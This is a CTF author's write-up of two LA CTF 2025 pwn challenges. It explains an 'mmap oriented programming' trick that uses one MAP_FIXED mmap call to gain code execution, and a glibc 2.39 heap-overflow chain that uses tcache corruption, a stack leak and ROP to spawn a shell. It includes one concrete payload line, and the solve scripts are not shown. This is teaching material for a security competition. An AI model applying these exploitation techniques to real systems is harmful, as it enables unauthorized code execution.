LA CTF 2025 - Author Writeups
Writeups of pwn/mmapro and pwn/lamp from LA CTF 2025.
overview
This year I wrote six challenges for LA CTF: lamp
, mmapro
, eepy
, messenger
, and library
in the pwn category, and elfisyou
in the rev category. My solutions can be found in the challenge archive, but I also decided to provide writeups for two of the challenges that I found particularly interesting.
mmapro
This challenge requires you to spawn a shell using a single mmap syscall. The program exits immediately after the call, not providing control over the contents of the mapped memory. The technique for solving this seems fairly novel, so I’m going to coin it “mmap oriented programming” or MOP for short, although it’s unlikely to be useful outside of contrived challenges like this one.
source
|
|
overview
The program is dynamically linked with glibc 2.37. We are given a libc address leak and must supply six 64-bit arguments to mmap. The program will exit immediately after, which involves calling various libc destructor functions.
In order to modify the subsequent execution of the program in any way, we must clobber a libc code mapping. With the MAP_FIXED
flag, mmap will interpret its first argument as an absolute address and replace any existing mappings that overlap the new range. This mapped memory will be completely zeroed, effectively letting us punch a single, contiguous hole of null bytes into libc’s code region. The position and length of this hole is limited to page granularity.
This is an x86-64 binary, so the null byte pages will decode to the repeated instruction add byte ptr [rax], al
, which is encoded as two null bytes. This is effectively a nop when rax
points to writeable memory. If we start a mapping at some page in libc that is executed when rax
is writeable, we can cause the program to nop slide through N
pages, N
being dependent on our length parameter, and it will continue executing at the start of some later code page.
This “landing” page can be thought of like a gadget, as it contains some unique instructions that may allow us to continue code execution depending on how it uses memory or registers that we control. The page granularity will slice most instructions in half, but thanks to x86 encoding, these may still be useful to us.
solution
There are 376 pages of code on this libc. We have to first find some valid starting pages, and for each we will have at most 375 different slide lengths into different gadgets. I wrote some scripts to extract these gadgets and began inspecting them manually, but this isn’t super feasible since they often depend on various conditionals and jumps. It would make sense to write a symbolic execution tool for this.
There are multiple starting pages that work with a writeable rax
, but the most useful one is the page containing the code for the libc mmap
function itself, since we will have control over six registers at that point. rax
will be the syscall return value, which is the address of the page we mapped, and we can ensure it’s writeable because we control the protection parameter. I wrote a gdb script to test each slide length given this starting page offset of 0x115000
and wrote the contents of the registers on segfault to a file. I found that at length 0x57000
we could control rip
. This was due to our parameters being saved on the stack, and the gadget eventually causing a return to those values after calling ioctl
.
There are unfortunately a few restrictions to the parameters we must comply with to ensure the mmap succeeds. By bruteforcing, I found that the bits set in the flags parameter have to match the mask 0xffffffffffebfff2
, and the mapping must be at least writeable and executable, so the prot parameter needs to have its 2 and 4 bits set. Additionally, the last parameter, offset, must be page aligned.
The gadget at offset 0x57000
returns to our parameters on the stack starting with flags, followed by fd and offset. fd is completely controllable, so I set it to the address of gets, and I set flags to a single ret gadget that complies with the mask (slightly dependent on ASLR). rdi
will be set to the address we mapped, meaning the gets call will write code to our region. After the gets call, we will return to our offset parameter, which we can make the initial page that the gets
wrote to, and this satisfies the alignment check. We can then send shellcode to gets.
The solution thus boils down to:
mmap(libc.address+0x115000, 0x57000, 7, libc.address+0xbda72, libc.sym.gets, libc.address+0x115000)
I will note that it took me testing slides on multiple different libcs before I found one that had a working gadget. My full solve script is provided below.
|
|
lamp
This is an arbitrary heap overflow challenge on glibc 2.39 with no file streams in use and an infinite program loop. We are initially given a heap leak, and allocations are restricted to a max size of 0xff
. Input is also taken through a custom gets function that doesn’t null terminate, allowing partial overwrites. There is an amazing writeup up of this challenge by Jonathan Keller. It provides a much more detailed description of the solve path compared to my brief overview here, so I highly recommend checking it out. The source for the challenge is provided below.
source
|
|
solution
We first set up a repeatable sysmalloc free primitive to obtain free chunks of sizes up to 0xf0
.
|
|
We can build an arbitrary write primitive by overflowing into freed tcache chunks, a technique described here. There are no file streams and our program never exits, so we’ll need to target the stack to hijack control flow. The run
binary accompanied with the challenge execves lamp
with a particular argv and envp, which hints at the next step.
We fill up the tcache to get smallbin chunks and partial overwrite the libc arena list pointer to link in a chunk around __libc_argv
. The run
binary ensures that there are enough environment variables, which result in pointers being placed at offsets that make it a valid unlinkable chunk. This part requires a 4 bit bruteforce for the libc partial overwrite, and it’s the only bruteforce we’ll need.
When we allocate from the smallbin after forging the entry, it will perform tcache stashing. We set enough prior smallbin entries such that the __libc_argv
chunk is the last chunk linkable into the tcache due to the max of 7 entries, which both prevents corruption and places it as a raw pointer in the heap through the tcache_perthread_struct (TPS).
We use our arbitrary write to overwrite the low 2 bytes of the stack pointer to zero. This will be a valid address that’s guaranteed to be below our current position on the stack. Given our infinite overflow, we can keep sending bytes up the stack until we reach the return address of read
, partial overwriting it with the byte 0xa0
to loop main through _start
. This is implemented by adding a recv
timeout after each byte sent to detect the looping. By keeping track of the number of bytes we have to send before the loop is triggered, we can calculate the low bytes of the stack for future overwrites.
We want a stack leak when main loops in order to set up ROP for later, so before beginning this process, we duplicate a mangled __libc_argv
pointer into the 0x20
TPS entry. This is achieved by corrupting the fd to a chunk with the stack pointer as the first qword, which it will mangle when placing into the TPS when the previous chunk is allocated. When we loop main, it will allocate a 0x20
chunk and free it, mangling the current already mangled stack TPS entry and placing it in the first qword, which is leaked to us. Because the mangling happens twice, we end up with a normal stack pointer for our leak, although it being mangled wouldn’t be an issue anyway, since we would have the heap leak to demangle it.
Now we have a full stack leak by combining our calculated byte count with the address leak. We repeat this general process for a libc leak, and finally allocate a chunk on the stack to hold our ROP chain. We then send part of our ROP chain through the strtoul buffer and partial overwrite to a ret
gadget with 0xf8
. This initiates our ROP chain and spawns a shell.
I think the idea of starting with a low stack address to both avoid bruteforce and calculate a leak was pretty cool. My full solve script with comments is provided below.
|
|